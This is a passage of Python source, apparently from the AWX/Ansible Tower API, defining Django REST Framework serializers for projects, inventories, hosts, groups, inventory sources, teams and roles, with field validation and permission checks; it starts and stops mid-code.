if get_field_from_model_or_attrs(fd):\n raise serializers.ValidationError({fd: _('Update options must be set to false for manual projects.')})\n return super(ProjectSerializer, self).validate(attrs)\n\n\nclass ProjectPlaybooksSerializer(ProjectSerializer):\n\n playbooks = serializers.SerializerMethodField(help_text=_('Array of playbooks available within this project.'))\n\n class Meta:\n model = Project\n fields = ('playbooks',)\n\n def get_playbooks(self, obj):\n return obj.playbook_files if obj.scm_type else obj.playbooks\n\n @property\n def data(self):\n ret = super(ProjectPlaybooksSerializer, self).data\n ret = ret.get('playbooks', [])\n return ReturnList(ret, serializer=self)\n\n\nclass ProjectInventoriesSerializer(ProjectSerializer):\n\n inventory_files = serializers.ReadOnlyField(help_text=_(\n 'Array of inventory files and directories available within this project, '\n 'not comprehensive.'))\n\n class Meta:\n model = Project\n fields = ('inventory_files',)\n\n @property\n def data(self):\n ret = super(ProjectInventoriesSerializer, self).data\n ret = ret.get('inventory_files', [])\n return ReturnList(ret, serializer=self)\n\n\nclass ProjectUpdateViewSerializer(ProjectSerializer):\n\n can_update = serializers.BooleanField(read_only=True)\n\n class Meta:\n fields = ('can_update',)\n\n\nclass ProjectUpdateSerializer(UnifiedJobSerializer, ProjectOptionsSerializer):\n\n class Meta:\n model = ProjectUpdate\n fields = ('*', 'project', 'job_type', '-controller_node')\n\n def get_related(self, obj):\n res = super(ProjectUpdateSerializer, self).get_related(obj)\n try:\n res.update(dict(\n project = self.reverse('api:project_detail', kwargs={'pk': obj.project.pk}),\n ))\n except ObjectDoesNotExist:\n pass\n res.update(dict(\n cancel = self.reverse('api:project_update_cancel', kwargs={'pk': obj.pk}),\n scm_inventory_updates = self.reverse('api:project_update_scm_inventory_updates', kwargs={'pk': obj.pk}),\n notifications = self.reverse('api:project_update_notifications_list', kwargs={'pk': obj.pk}),\n events = self.reverse('api:project_update_events_list', kwargs={'pk': obj.pk}),\n ))\n return res\n\n\nclass ProjectUpdateDetailSerializer(ProjectUpdateSerializer):\n\n host_status_counts = serializers.SerializerMethodField(\n help_text=_('A count of hosts uniquely assigned to each status.'),\n )\n playbook_counts = serializers.SerializerMethodField(\n help_text=_('A count of all plays and tasks for the job run.'),\n )\n\n class Meta:\n model = ProjectUpdate\n fields = ('*', 'host_status_counts', 'playbook_counts',)\n\n def get_playbook_counts(self, obj):\n task_count = obj.project_update_events.filter(event='playbook_on_task_start').count()\n play_count = obj.project_update_events.filter(event='playbook_on_play_start').count()\n\n data = {'play_count': play_count, 'task_count': task_count}\n\n return data\n\n def get_host_status_counts(self, obj):\n try:\n counts = obj.project_update_events.only('event_data').get(event='playbook_on_stats').get_host_status_counts()\n except ProjectUpdateEvent.DoesNotExist:\n counts = {}\n\n return counts\n\n\nclass ProjectUpdateListSerializer(ProjectUpdateSerializer, UnifiedJobListSerializer):\n\n class Meta:\n model = ProjectUpdate\n fields = ('*', '-controller_node') # field removal undone by UJ serializer\n\n\nclass ProjectUpdateCancelSerializer(ProjectUpdateSerializer):\n\n can_cancel = serializers.BooleanField(read_only=True)\n\n class Meta:\n fields = ('can_cancel',)\n\n\nclass BaseSerializerWithVariables(BaseSerializer):\n\n def validate_variables(self, 
value):\n return vars_validate_or_raise(value)\n\n\nclass InventorySerializer(BaseSerializerWithVariables):\n show_capabilities = ['edit', 'delete', 'adhoc', 'copy']\n capabilities_prefetch = [\n 'admin', 'adhoc',\n {'copy': 'organization.inventory_admin'}\n ]\n groups_with_active_failures = serializers.IntegerField(\n read_only=True,\n min_value=0,\n help_text=_('This field has been deprecated and will be removed in a future release')\n )\n\n\n class Meta:\n model = Inventory\n fields = ('*', 'organization', 'kind', 'host_filter', 'variables', 'has_active_failures',\n 'total_hosts', 'hosts_with_active_failures', 'total_groups',\n 'groups_with_active_failures', 'has_inventory_sources',\n 'total_inventory_sources', 'inventory_sources_with_failures',\n 'insights_credential', 'pending_deletion',)\n\n def get_related(self, obj):\n res = super(InventorySerializer, self).get_related(obj)\n res.update(dict(\n hosts = self.reverse('api:inventory_hosts_list', kwargs={'pk': obj.pk}),\n groups = self.reverse('api:inventory_groups_list', kwargs={'pk': obj.pk}),\n root_groups = self.reverse('api:inventory_root_groups_list', kwargs={'pk': obj.pk}),\n variable_data = self.reverse('api:inventory_variable_data', kwargs={'pk': obj.pk}),\n script = self.reverse('api:inventory_script_view', kwargs={'pk': obj.pk}),\n tree = self.reverse('api:inventory_tree_view', kwargs={'pk': obj.pk}),\n inventory_sources = self.reverse('api:inventory_inventory_sources_list', kwargs={'pk': obj.pk}),\n update_inventory_sources = self.reverse('api:inventory_inventory_sources_update', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:inventory_activity_stream_list', kwargs={'pk': obj.pk}),\n job_templates = self.reverse('api:inventory_job_template_list', kwargs={'pk': obj.pk}),\n ad_hoc_commands = self.reverse('api:inventory_ad_hoc_commands_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:inventory_access_list', kwargs={'pk': obj.pk}),\n object_roles = self.reverse('api:inventory_object_roles_list', kwargs={'pk': obj.pk}),\n instance_groups = self.reverse('api:inventory_instance_groups_list', kwargs={'pk': obj.pk}),\n copy = self.reverse('api:inventory_copy', kwargs={'pk': obj.pk})\n ))\n if obj.insights_credential:\n res['insights_credential'] = self.reverse('api:credential_detail', kwargs={'pk': obj.insights_credential.pk})\n if obj.organization:\n res['organization'] = self.reverse('api:organization_detail', kwargs={'pk': obj.organization.pk})\n return res\n\n def to_representation(self, obj):\n ret = super(InventorySerializer, self).to_representation(obj)\n if obj is not None and 'organization' in ret and not obj.organization:\n ret['organization'] = None\n return ret\n\n def validate_host_filter(self, host_filter):\n if host_filter:\n try:\n for match in JSONBField.get_lookups().keys():\n if match == 'exact':\n # __exact is allowed\n continue\n match = '__{}'.format(match)\n if re.match(\n 'ansible_facts[^=]+{}='.format(match),\n host_filter\n ):\n raise models.base.ValidationError({\n 'host_filter': 'ansible_facts does not support searching with {}'.format(match)\n })\n SmartFilter().query_from_string(host_filter)\n except RuntimeError as e:\n raise models.base.ValidationError(e)\n return host_filter\n\n def validate(self, attrs):\n kind = None\n if 'kind' in attrs:\n kind = attrs['kind']\n elif self.instance:\n kind = self.instance.kind\n\n host_filter = None\n if 'host_filter' in attrs:\n host_filter = attrs['host_filter']\n elif self.instance:\n host_filter = self.instance.host_filter\n\n if 
kind == 'smart' and not host_filter:\n raise serializers.ValidationError({'host_filter': _(\n 'Smart inventories must specify host_filter')})\n return super(InventorySerializer, self).validate(attrs)\n\n\nclass InventoryScriptSerializer(InventorySerializer):\n\n class Meta:\n fields = ()\n\n\nclass HostSerializer(BaseSerializerWithVariables):\n show_capabilities = ['edit', 'delete']\n capabilities_prefetch = ['inventory.admin']\n\n class Meta:\n model = Host\n fields = ('*', 'inventory', 'enabled', 'instance_id', 'variables',\n 'has_active_failures', 'has_inventory_sources', 'last_job',\n 'last_job_host_summary', 'insights_system_id', 'ansible_facts_modified',)\n read_only_fields = ('last_job', 'last_job_host_summary', 'insights_system_id',\n 'ansible_facts_modified',)\n\n def build_relational_field(self, field_name, relation_info):\n field_class, field_kwargs = super(HostSerializer, self).build_relational_field(field_name, relation_info)\n # Inventory is read-only unless creating a new host.\n if self.instance and field_name == 'inventory':\n field_kwargs['read_only'] = True\n field_kwargs.pop('queryset', None)\n return field_class, field_kwargs\n\n def get_related(self, obj):\n res = super(HostSerializer, self).get_related(obj)\n res.update(dict(\n variable_data = self.reverse('api:host_variable_data', kwargs={'pk': obj.pk}),\n groups = self.reverse('api:host_groups_list', kwargs={'pk': obj.pk}),\n all_groups = self.reverse('api:host_all_groups_list', kwargs={'pk': obj.pk}),\n job_events = self.reverse('api:host_job_events_list', kwargs={'pk': obj.pk}),\n job_host_summaries = self.reverse('api:host_job_host_summaries_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:host_activity_stream_list', kwargs={'pk': obj.pk}),\n inventory_sources = self.reverse('api:host_inventory_sources_list', kwargs={'pk': obj.pk}),\n smart_inventories = self.reverse('api:host_smart_inventories_list', kwargs={'pk': obj.pk}),\n ad_hoc_commands = self.reverse('api:host_ad_hoc_commands_list', kwargs={'pk': obj.pk}),\n ad_hoc_command_events = self.reverse('api:host_ad_hoc_command_events_list', kwargs={'pk': obj.pk}),\n insights = self.reverse('api:host_insights', kwargs={'pk': obj.pk}),\n ansible_facts = self.reverse('api:host_ansible_facts_detail', kwargs={'pk': obj.pk}),\n ))\n if obj.inventory:\n res['inventory'] = self.reverse('api:inventory_detail', kwargs={'pk': obj.inventory.pk})\n if obj.last_job:\n res['last_job'] = self.reverse('api:job_detail', kwargs={'pk': obj.last_job.pk})\n if obj.last_job_host_summary:\n res['last_job_host_summary'] = self.reverse('api:job_host_summary_detail', kwargs={'pk': obj.last_job_host_summary.pk})\n return res\n\n def get_summary_fields(self, obj):\n d = super(HostSerializer, self).get_summary_fields(obj)\n try:\n d['last_job']['job_template_id'] = obj.last_job.job_template.id\n d['last_job']['job_template_name'] = obj.last_job.job_template.name\n except (KeyError, AttributeError):\n pass\n if has_model_field_prefetched(obj, 'groups'):\n group_list = sorted([{'id': g.id, 'name': g.name} for g in obj.groups.all()], key=lambda x: x['id'])[:5]\n else:\n group_list = [{'id': g.id, 'name': g.name} for g in obj.groups.all().order_by('id')[:5]]\n group_cnt = obj.groups.count()\n d.setdefault('groups', {'count': group_cnt, 'results': group_list})\n d.setdefault('recent_jobs', [{\n 'id': j.job.id,\n 'name': j.job.job_template.name if j.job.job_template is not None else \"\",\n 'status': j.job.status,\n 'finished': j.job.finished,\n } for j in 
obj.job_host_summaries.select_related('job__job_template').order_by('-created')[:5]])\n return d\n\n def _get_host_port_from_name(self, name):\n # Allow hostname (except IPv6 for now) to specify the port # inline.\n port = None\n if name.count(':') == 1:\n name, port = name.split(':')\n try:\n port = int(port)\n if port < 1 or port > 65535:\n raise ValueError\n except ValueError:\n raise serializers.ValidationError(_(u'Invalid port specification: %s') % force_text(port))\n return name, port\n\n def validate_name(self, value):\n name = force_text(value or '')\n # Validate here only, update in main validate method.\n host, port = self._get_host_port_from_name(name)\n return value\n\n def validate_inventory(self, value):\n if value.kind == 'smart':\n raise serializers.ValidationError({\"detail\": _(\"Cannot create Host for Smart Inventory\")})\n return value\n\n def validate_variables(self, value):\n return vars_validate_or_raise(value)\n\n def validate(self, attrs):\n name = force_text(attrs.get('name', self.instance and self.instance.name or ''))\n host, port = self._get_host_port_from_name(name)\n\n if port:\n attrs['name'] = host\n variables = force_text(attrs.get('variables', self.instance and self.instance.variables or ''))\n vars_dict = parse_yaml_or_json(variables)\n vars_dict['ansible_ssh_port'] = port\n attrs['variables'] = json.dumps(vars_dict)\n\n return super(HostSerializer, self).validate(attrs)\n\n def to_representation(self, obj):\n ret = super(HostSerializer, self).to_representation(obj)\n if not obj:\n return ret\n if 'inventory' in ret and not obj.inventory:\n ret['inventory'] = None\n if 'last_job' in ret and not obj.last_job:\n ret['last_job'] = None\n if 'last_job_host_summary' in ret and not obj.last_job_host_summary:\n ret['last_job_host_summary'] = None\n return ret\n\n\nclass AnsibleFactsSerializer(BaseSerializer):\n class Meta:\n model = Host\n\n def to_representation(self, obj):\n return obj.ansible_facts\n\n\nclass GroupSerializer(BaseSerializerWithVariables):\n show_capabilities = ['copy', 'edit', 'delete']\n capabilities_prefetch = ['inventory.admin', 'inventory.adhoc']\n groups_with_active_failures = serializers.IntegerField(\n read_only=True,\n min_value=0,\n help_text=_('This field has been deprecated and will be removed in a future release')\n )\n\n class Meta:\n model = Group\n fields = ('*', 'inventory', 'variables', 'has_active_failures',\n 'total_hosts', 'hosts_with_active_failures', 'total_groups',\n 'groups_with_active_failures', 'has_inventory_sources')\n\n def build_relational_field(self, field_name, relation_info):\n field_class, field_kwargs = super(GroupSerializer, self).build_relational_field(field_name, relation_info)\n # Inventory is read-only unless creating a new group.\n if self.instance and field_name == 'inventory':\n field_kwargs['read_only'] = True\n field_kwargs.pop('queryset', None)\n return field_class, field_kwargs\n\n def get_related(self, obj):\n res = super(GroupSerializer, self).get_related(obj)\n res.update(dict(\n variable_data = self.reverse('api:group_variable_data', kwargs={'pk': obj.pk}),\n hosts = self.reverse('api:group_hosts_list', kwargs={'pk': obj.pk}),\n potential_children = self.reverse('api:group_potential_children_list', kwargs={'pk': obj.pk}),\n children = self.reverse('api:group_children_list', kwargs={'pk': obj.pk}),\n all_hosts = self.reverse('api:group_all_hosts_list', kwargs={'pk': obj.pk}),\n job_events = self.reverse('api:group_job_events_list', kwargs={'pk': obj.pk}),\n job_host_summaries = 
self.reverse('api:group_job_host_summaries_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:group_activity_stream_list', kwargs={'pk': obj.pk}),\n inventory_sources = self.reverse('api:group_inventory_sources_list', kwargs={'pk': obj.pk}),\n ad_hoc_commands = self.reverse('api:group_ad_hoc_commands_list', kwargs={'pk': obj.pk}),\n ))\n if obj.inventory:\n res['inventory'] = self.reverse('api:inventory_detail', kwargs={'pk': obj.inventory.pk})\n return res\n\n def validate_name(self, value):\n if value in ('all', '_meta'):\n raise serializers.ValidationError(_('Invalid group name.'))\n return value\n\n def validate_inventory(self, value):\n if value.kind == 'smart':\n raise serializers.ValidationError({\"detail\": _(\"Cannot create Group for Smart Inventory\")})\n return value\n\n def to_representation(self, obj):\n ret = super(GroupSerializer, self).to_representation(obj)\n if obj is not None and 'inventory' in ret and not obj.inventory:\n ret['inventory'] = None\n return ret\n\n\nclass GroupTreeSerializer(GroupSerializer):\n\n children = serializers.SerializerMethodField()\n\n class Meta:\n model = Group\n fields = ('*', 'children')\n\n def get_children(self, obj):\n if obj is None:\n return {}\n children_qs = obj.children\n children_qs = children_qs.select_related('inventory')\n children_qs = children_qs.prefetch_related('inventory_source')\n return GroupTreeSerializer(children_qs, many=True).data\n\n\nclass BaseVariableDataSerializer(BaseSerializer):\n\n class Meta:\n fields = ('variables',)\n\n def to_representation(self, obj):\n if obj is None:\n return {}\n ret = super(BaseVariableDataSerializer, self).to_representation(obj)\n return parse_yaml_or_json(ret.get('variables', '') or '{}')\n\n def to_internal_value(self, data):\n data = {'variables': json.dumps(data)}\n return super(BaseVariableDataSerializer, self).to_internal_value(data)\n\n\nclass InventoryVariableDataSerializer(BaseVariableDataSerializer):\n\n class Meta:\n model = Inventory\n\n\nclass HostVariableDataSerializer(BaseVariableDataSerializer):\n\n class Meta:\n model = Host\n\n\nclass GroupVariableDataSerializer(BaseVariableDataSerializer):\n\n class Meta:\n model = Group\n\n\nclass CustomInventoryScriptSerializer(BaseSerializer):\n\n script = serializers.CharField(trim_whitespace=False)\n show_capabilities = ['edit', 'delete', 'copy']\n capabilities_prefetch = [\n {'edit': 'admin'}\n ]\n\n class Meta:\n model = CustomInventoryScript\n fields = ('*', \"script\", \"organization\")\n\n def validate_script(self, value):\n if not value.startswith(\"#!\"):\n raise serializers.ValidationError(_('Script must begin with a hashbang sequence: i.e.... 
#!/usr/bin/env python'))\n return value\n\n def to_representation(self, obj):\n ret = super(CustomInventoryScriptSerializer, self).to_representation(obj)\n if obj is None:\n return ret\n request = self.context.get('request', None)\n if request.user not in obj.admin_role and \\\n not request.user.is_superuser and \\\n not request.user.is_system_auditor and \\\n not (obj.organization is not None and request.user in obj.organization.auditor_role):\n ret['script'] = None\n return ret\n\n def get_related(self, obj):\n res = super(CustomInventoryScriptSerializer, self).get_related(obj)\n res.update(dict(\n object_roles = self.reverse('api:inventory_script_object_roles_list', kwargs={'pk': obj.pk}),\n copy = self.reverse('api:inventory_script_copy', kwargs={'pk': obj.pk}),\n ))\n\n if obj.organization:\n res['organization'] = self.reverse('api:organization_detail', kwargs={'pk': obj.organization.pk})\n return res\n\n\nclass InventorySourceOptionsSerializer(BaseSerializer):\n credential = DeprecatedCredentialField(\n help_text=_('Cloud credential to use for inventory updates.')\n )\n\n class Meta:\n fields = ('*', 'source', 'source_path', 'source_script', 'source_vars', 'credential',\n 'source_regions', 'instance_filters', 'group_by', 'overwrite', 'overwrite_vars',\n 'custom_virtualenv', 'timeout', 'verbosity')\n\n def get_related(self, obj):\n res = super(InventorySourceOptionsSerializer, self).get_related(obj)\n if obj.credential: # TODO: remove when 'credential' field is removed\n res['credential'] = self.reverse('api:credential_detail',\n kwargs={'pk': obj.credential})\n if obj.source_script:\n res['source_script'] = self.reverse('api:inventory_script_detail', kwargs={'pk': obj.source_script.pk})\n return res\n\n def validate_source_vars(self, value):\n ret = vars_validate_or_raise(value)\n for env_k in parse_yaml_or_json(value):\n if env_k in settings.INV_ENV_VARIABLE_BLACKLIST:\n raise serializers.ValidationError(_(\"`{}` is a prohibited environment variable\".format(env_k)))\n return ret\n\n def validate(self, attrs):\n # TODO: Validate source, validate source_regions\n errors = {}\n\n source = attrs.get('source', self.instance and self.instance.source or '')\n source_script = attrs.get('source_script', self.instance and self.instance.source_script or '')\n if source == 'custom':\n if source_script is None or source_script == '':\n errors['source_script'] = _(\"If 'source' is 'custom', 'source_script' must be provided.\")\n else:\n try:\n if not self.instance:\n dest_inventory = attrs.get('inventory', None)\n if not dest_inventory:\n errors['inventory'] = _(\"Must provide an inventory.\")\n else:\n dest_inventory = self.instance.inventory\n if dest_inventory and source_script.organization != dest_inventory.organization:\n errors['source_script'] = _(\"The 'source_script' does not belong to the same organization as the inventory.\")\n except Exception:\n errors['source_script'] = _(\"'source_script' doesn't exist.\")\n logger.exception('Problem processing source_script validation.')\n\n if errors:\n raise serializers.ValidationError(errors)\n\n return super(InventorySourceOptionsSerializer, self).validate(attrs)\n\n\nclass InventorySourceSerializer(UnifiedJobTemplateSerializer, InventorySourceOptionsSerializer):\n\n status = serializers.ChoiceField(choices=InventorySource.INVENTORY_SOURCE_STATUS_CHOICES, read_only=True)\n last_update_failed = serializers.BooleanField(read_only=True)\n last_updated = serializers.DateTimeField(read_only=True)\n show_capabilities = ['start', 'schedule', 'edit', 
'delete']\n capabilities_prefetch = [\n {'admin': 'inventory.admin'},\n {'start': 'inventory.update'}\n ]\n\n class Meta:\n model = InventorySource\n fields = ('*', 'name', 'inventory', 'update_on_launch', 'update_cache_timeout',\n 'source_project', 'update_on_project_update') + \\\n ('last_update_failed', 'last_updated') # Backwards compatibility.\n\n def get_related(self, obj):\n res = super(InventorySourceSerializer, self).get_related(obj)\n res.update(dict(\n update = self.reverse('api:inventory_source_update_view', kwargs={'pk': obj.pk}),\n inventory_updates = self.reverse('api:inventory_source_updates_list', kwargs={'pk': obj.pk}),\n schedules = self.reverse('api:inventory_source_schedules_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:inventory_source_activity_stream_list', kwargs={'pk': obj.pk}),\n hosts = self.reverse('api:inventory_source_hosts_list', kwargs={'pk': obj.pk}),\n groups = self.reverse('api:inventory_source_groups_list', kwargs={'pk': obj.pk}),\n notification_templates_any = self.reverse('api:inventory_source_notification_templates_any_list', kwargs={'pk': obj.pk}),\n notification_templates_success = self.reverse('api:inventory_source_notification_templates_success_list', kwargs={'pk': obj.pk}),\n notification_templates_error = self.reverse('api:inventory_source_notification_templates_error_list', kwargs={'pk': obj.pk}),\n ))\n if obj.inventory:\n res['inventory'] = self.reverse('api:inventory_detail', kwargs={'pk': obj.inventory.pk})\n if obj.source_project_id is not None:\n res['source_project'] = self.reverse('api:project_detail', kwargs={'pk': obj.source_project.pk})\n # Backwards compatibility.\n if obj.current_update:\n res['current_update'] = self.reverse('api:inventory_update_detail',\n kwargs={'pk': obj.current_update.pk})\n if obj.last_update:\n res['last_update'] = self.reverse('api:inventory_update_detail',\n kwargs={'pk': obj.last_update.pk})\n else:\n res['credentials'] = self.reverse('api:inventory_source_credentials_list', kwargs={'pk': obj.pk})\n return res\n\n def get_group(self, obj): # TODO: remove in 3.3\n if obj.deprecated_group:\n return obj.deprecated_group.id\n return None\n\n def build_relational_field(self, field_name, relation_info):\n field_class, field_kwargs = super(InventorySourceSerializer, self).build_relational_field(field_name, relation_info)\n # SCM Project and inventory are read-only unless creating a new inventory.\n if self.instance and field_name == 'inventory':\n field_kwargs['read_only'] = True\n field_kwargs.pop('queryset', None)\n return field_class, field_kwargs\n\n # TODO: remove when old 'credential' fields are removed\n def build_field(self, field_name, info, model_class, nested_depth):\n # have to special-case the field so that DRF will not automagically make it\n # read-only because it's a property on the model.\n if field_name == 'credential':\n return self.build_standard_field(field_name, self.credential)\n return super(InventorySourceOptionsSerializer, self).build_field(field_name, info, model_class, nested_depth)\n\n def to_representation(self, obj):\n ret = super(InventorySourceSerializer, self).to_representation(obj)\n if obj is None:\n return ret\n if 'inventory' in ret and not obj.inventory:\n ret['inventory'] = None\n return ret\n\n def validate_source_project(self, value):\n if value and value.scm_type == '':\n raise serializers.ValidationError(_(\"Cannot use manual project for SCM-based inventory.\"))\n return value\n\n def validate_update_on_project_update(self, value):\n if value 
and self.instance and self.instance.schedules.exists():\n raise serializers.ValidationError(_(\"Setting not compatible with existing schedules.\"))\n return value\n\n def validate_inventory(self, value):\n if value and value.kind == 'smart':\n raise serializers.ValidationError({\"detail\": _(\"Cannot create Inventory Source for Smart Inventory\")})\n return value\n\n # TODO: remove when old 'credential' fields are removed\n def create(self, validated_data):\n deprecated_fields = {}\n if 'credential' in validated_data:\n deprecated_fields['credential'] = validated_data.pop('credential')\n obj = super(InventorySourceSerializer, self).create(validated_data)\n if deprecated_fields:\n self._update_deprecated_fields(deprecated_fields, obj)\n return obj\n\n # TODO: remove when old 'credential' fields are removed\n def update(self, obj, validated_data):\n deprecated_fields = {}\n if 'credential' in validated_data:\n deprecated_fields['credential'] = validated_data.pop('credential')\n obj = super(InventorySourceSerializer, self).update(obj, validated_data)\n if deprecated_fields:\n self._update_deprecated_fields(deprecated_fields, obj)\n return obj\n\n # TODO: remove when old 'credential' fields are removed\n def _update_deprecated_fields(self, fields, obj):\n if 'credential' in fields:\n new_cred = fields['credential']\n existing = obj.credentials.all()\n if new_cred not in existing:\n for cred in existing:\n # Remove all other cloud credentials\n obj.credentials.remove(cred)\n if new_cred:\n # Add new credential\n obj.credentials.add(new_cred)\n\n def validate(self, attrs):\n deprecated_fields = {}\n if 'credential' in attrs: # TODO: remove when 'credential' field removed\n deprecated_fields['credential'] = attrs.pop('credential')\n\n def get_field_from_model_or_attrs(fd):\n return attrs.get(fd, self.instance and getattr(self.instance, fd) or None)\n\n if get_field_from_model_or_attrs('source') != 'scm':\n redundant_scm_fields = list(filter(\n lambda x: attrs.get(x, None),\n ['source_project', 'source_path', 'update_on_project_update']\n ))\n if redundant_scm_fields:\n raise serializers.ValidationError(\n {\"detail\": _(\"Cannot set %s if not SCM type.\" % ' '.join(redundant_scm_fields))}\n )\n\n attrs = super(InventorySourceSerializer, self).validate(attrs)\n\n # Check type consistency of source and cloud credential, if provided\n if 'credential' in deprecated_fields: # TODO: remove when v2 API is deprecated\n cred = deprecated_fields['credential']\n attrs['credential'] = cred\n if cred is not None:\n cred = Credential.objects.get(pk=cred)\n view = self.context.get('view', None)\n if (not view) or (not view.request) or (view.request.user not in cred.use_role):\n raise PermissionDenied()\n cred_error = InventorySource.cloud_credential_validation(\n get_field_from_model_or_attrs('source'),\n cred\n )\n if cred_error:\n raise serializers.ValidationError({\"credential\": cred_error})\n\n return attrs\n\n\nclass InventorySourceUpdateSerializer(InventorySourceSerializer):\n\n can_update = serializers.BooleanField(read_only=True)\n\n class Meta:\n fields = ('can_update',)\n\n\nclass InventoryUpdateSerializer(UnifiedJobSerializer, InventorySourceOptionsSerializer):\n\n custom_virtualenv = serializers.ReadOnlyField()\n\n class Meta:\n model = InventoryUpdate\n fields = ('*', 'inventory', 'inventory_source', 'license_error', 'org_host_limit_error',\n 'source_project_update', 'custom_virtualenv', '-controller_node',)\n\n def get_related(self, obj):\n res = super(InventoryUpdateSerializer, 
self).get_related(obj)\n try:\n res.update(dict(\n inventory_source = self.reverse(\n 'api:inventory_source_detail', kwargs={'pk': obj.inventory_source.pk}\n ),\n ))\n except ObjectDoesNotExist:\n pass\n res.update(dict(\n cancel = self.reverse('api:inventory_update_cancel', kwargs={'pk': obj.pk}),\n notifications = self.reverse('api:inventory_update_notifications_list', kwargs={'pk': obj.pk}),\n events = self.reverse('api:inventory_update_events_list', kwargs={'pk': obj.pk}),\n ))\n if obj.source_project_update_id:\n res['source_project_update'] = self.reverse('api:project_update_detail',\n kwargs={'pk': obj.source_project_update.pk})\n if obj.inventory:\n res['inventory'] = self.reverse('api:inventory_detail', kwargs={'pk': obj.inventory.pk})\n\n res['credentials'] = self.reverse('api:inventory_update_credentials_list', kwargs={'pk': obj.pk})\n\n return res\n\n\nclass InventoryUpdateDetailSerializer(InventoryUpdateSerializer):\n\n source_project = serializers.SerializerMethodField(\n help_text=_('The project used for this job.'),\n method_name='get_source_project_id'\n )\n\n class Meta:\n model = InventoryUpdate\n fields = ('*', 'source_project',)\n\n def get_source_project(self, obj):\n return getattrd(obj, 'source_project_update.unified_job_template', None)\n\n def get_source_project_id(self, obj):\n return getattrd(obj, 'source_project_update.unified_job_template.id', None)\n\n def get_related(self, obj):\n res = super(InventoryUpdateDetailSerializer, self).get_related(obj)\n source_project_id = self.get_source_project_id(obj)\n\n if source_project_id:\n res['source_project'] = self.reverse('api:project_detail', kwargs={'pk': source_project_id})\n return res\n\n def get_summary_fields(self, obj):\n summary_fields = super(InventoryUpdateDetailSerializer, self).get_summary_fields(obj)\n\n source_project = self.get_source_project(obj)\n if source_project:\n summary_fields['source_project'] = {}\n for field in SUMMARIZABLE_FK_FIELDS['project']:\n value = getattr(source_project, field, None)\n if value is not None:\n summary_fields['source_project'][field] = value\n\n cred = obj.credentials.first()\n if cred:\n summary_fields['credential'] = {\n 'id': cred.pk,\n 'name': cred.name,\n 'description': cred.description,\n 'kind': cred.kind,\n 'cloud': cred.credential_type.kind == 'cloud'\n }\n\n return summary_fields\n\n\nclass InventoryUpdateListSerializer(InventoryUpdateSerializer, UnifiedJobListSerializer):\n\n class Meta:\n model = InventoryUpdate\n fields = ('*', '-controller_node') # field removal undone by UJ serializer\n\n\nclass InventoryUpdateCancelSerializer(InventoryUpdateSerializer):\n\n can_cancel = serializers.BooleanField(read_only=True)\n\n class Meta:\n fields = ('can_cancel',)\n\n\nclass TeamSerializer(BaseSerializer):\n show_capabilities = ['edit', 'delete']\n\n class Meta:\n model = Team\n fields = ('*', 'organization')\n\n def get_related(self, obj):\n res = super(TeamSerializer, self).get_related(obj)\n res.update(dict(\n projects = self.reverse('api:team_projects_list', kwargs={'pk': obj.pk}),\n users = self.reverse('api:team_users_list', kwargs={'pk': obj.pk}),\n credentials = self.reverse('api:team_credentials_list', kwargs={'pk': obj.pk}),\n roles = self.reverse('api:team_roles_list', kwargs={'pk': obj.pk}),\n object_roles = self.reverse('api:team_object_roles_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:team_activity_stream_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:team_access_list', kwargs={'pk': obj.pk}),\n ))\n if 
obj.organization:\n res['organization'] = self.reverse('api:organization_detail', kwargs={'pk': obj.organization.pk})\n return res\n\n def to_representation(self, obj):\n ret = super(TeamSerializer, self).to_representation(obj)\n if obj is not None and 'organization' in ret and not obj.organization:\n ret['organization'] = None\n return ret\n\n\nclass RoleSerializer(BaseSerializer):\n\n class Meta:\n model = Role\n fields = ('*', '-created', '-modified')\n read_only_fields = ('id', 'role_field', 'description', 'name')\n\n def to_representation(self, obj):\n ret = super(RoleSerializer, self).to_representation(obj)\n\n if obj.object_id:\n content_object = obj.content_object\n if hasattr(content_object, 'username'):\n ret['summary_fields']['resource_name'] = obj.content_object.username\n if hasattr(content_object, 'name'):\n ret['summary_fields']['resource_name'] = obj.content_object.name\n content_model = obj.content_type.model_class()\n ret['summary_fields']['resource_type'] = get_type_for_model(content_model)\n ret['summary_fields']['resource_type_display_name'] = content_model._meta.verbose_name.title()\n\n return ret\n\n def get_related(self, obj):\n ret = super(RoleSerializer, self).get_related(obj)\n ret['users'] = self.reverse('api:role_users_list', kwargs={'pk': obj.pk})\n ret['teams'] = self.reverse('api:role_teams_list', kwargs={'pk': obj.pk})\n try:\n if obj.content_object:\n ret.update(reverse_gfk(obj.content_object, self.context.get('request')))\n except AttributeError:\n # AttributeError's happen if our content_object is pointing at\n # a model that no longer exists. This is dirty data and ideally\n # doesn't exist, but in case it does, let's not puke.\n pass\n return ret\n\n\nclass RoleSerializerWithParentAccess(RoleSerializer):\n show_capabilities = ['unattach']\n\n\nclass ResourceAccessListElementSerializer(UserSerializer):\n show_capabilities = [] # Clear fields from UserSerializer parent class\n\n def to_representation(self, user):\n '''\n With this method we derive \"direct\" and \"indirect\" access lists. 
Contained\n in the direct access list are all the roles the user is a member of, and\n all of the roles that are directly granted to any teams that the user is a\n member of.\n\n The indirect access list is a list of all of the roles that the user is\n a member of that are ancestors of any roles that grant permissions to\n the resource.\n '''\n ret = super(ResourceAccessListElementSerializer, self).to_representation(user)\n obj = self.context['view'].get_parent_object()\n if self.context['view'].request is not None:\n requesting_user = self.context['view'].request.user\n else:\n requesting_user = None\n\n if 'summary_fields' not in ret:\n ret['summary_fields'] = {}\n\n def format_role_perm(role):\n role_dict = { 'id': role.id, 'name': role.name, 'description': role.description}\n try:\n role_dict['resource_name'] = role.content_object.name\n role_dict['resource_type'] = get_type_for_model(role.content_type.model_class())\n role_dict['related'] = reverse_gfk(role.content_object, self.context.get('request'))\n except AttributeError:\n pass\n if role.content_type is not None:\n role_dict['user_capabilities'] = {'unattach': requesting_user.can_access(\n Role, 'unattach', role, user, 'members', data={}, skip_sub_obj_read_check=False)}\n else:\n # Singleton roles should not be managed from this view, as per copy/edit rework spec\n role_dict['user_capabilities'] = {'unattach': False}\n return { 'role': role_dict, 'descendant_roles': get_roles_on_resource(obj, role)}\n\n def 